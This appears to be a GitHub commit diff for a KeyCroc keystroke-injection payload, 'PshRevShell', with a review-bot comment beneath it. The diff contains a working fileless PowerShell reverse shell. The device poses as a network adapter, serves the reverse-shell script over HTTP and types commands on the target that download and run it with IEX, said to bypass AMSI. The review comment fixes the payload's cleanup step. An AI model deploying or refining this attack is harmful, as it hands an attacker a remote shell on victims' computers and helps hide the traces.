Minor update

pull/9/head
cerebro11 2020-07-29 01:17:22 +02:00 committed by GitHub
parent 81daa35a51
commit d0aa5bc7d9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 12 deletions


@ -1,19 +1,18 @@
# Title: PshRevShell
# Description: A fileless Powershell reverse shell to the KeyCroc
# Description: A fileless PowerShell reverse shell to the KeyCroc
# Author: cerebro11
# Date: 28/07/2020
#
# A netcat Listener should be ran on the KeyCroc before running payload "nc -nvlp 4444"
# Requirements : gohttp
# A netcat listener should be ran on the KeyCroc before executing the payload (ex: "nc -nvlp 4444")
# Requirements: gohttp
MATCH __croc_revshell
LED SETUP
# Step 0 : Specify target's PC keyboard language
# Step 0: Specify target's PC keyboard language
#export DUCKY_LANG=fr
# Step 1 : Change to ETHERNET ATTACKMODE (Windows)
# Step 1: Change to ETHERNET ATTACKMODE (Windows)
LED SETUP
if [ ! -f "/tmp/vidpid" ]
then
ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678
@ -24,17 +23,16 @@ else
fi
QUACK DELAY 5000
# Step 2 : Get KeyCroc's LAN IP
# Step 2: Get KeyCroc's LAN IP
croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
croc_port=4444
# Step 3 : Prepare scripts and run web service
# Step 3: Prepare scripts and run web service
mkdir -p /tmp/www
echo "\$client = New-Object System.Net.Sockets.TCPClient('${croc_ip}',${croc_port});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" > /tmp/www/Invoke-PowerShellTcpOneLine.ps1
cd /tmp/www/ && gohttp -p 80 &
# Step 3 : Inject KeyStrokes to bypass AMSI and spawn reverse shell
# Step 4: Inject KeyStrokes to bypass AMSI and spawn reverse shell
LED ATTACK
QUACK LOCK
QUACK GUI-r
@ -48,7 +46,7 @@ QUACK STRING "IEX (New-Object Net.WebClient).DownloadString('http://${croc_ip}/I
QUACK ENTER
QUACK UNLOCK
# Step 4 : Clean
# Step 5: Clean
LED CLEAN
sleep 10
kill $(ps -C "gohttp -p 80" -o pid --no-headers)
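Review bot: The cleanup on the last line, `kill $(ps -C "gohttp -p 80" -o pid --no-headers)`, is unlikely to find the web server: as far as I know procps `ps -C` matches the process's command name, not its argument list, so a pattern containing `-p 80` selects nothing, the substitution is empty, `kill` exits with a usage error, and gohttp keeps serving the reverse-shell loader on port 80 to anything on the RNDIS link long after the payload has fired. Since the server is started by this same script (`cd /tmp/www/ && gohttp -p 80 &` in the previous hunk), capture its PID instead of searching for it: start it as `(cd /tmp/www && exec gohttp -p 80) & gohttp_pid=$!` and clean up with `kill "$gohttp_pid"`. The `exec` matters because the `&&` list runs in a subshell, so without it `$!` would be the subshell's PID rather than gohttp's. I would also remove the staged `/tmp/www/Invoke-PowerShellTcpOneLine.ps1` in the clean step, since as written it stays on the device, and note that the fixed `sleep 10` only assumes the target has finished downloading it.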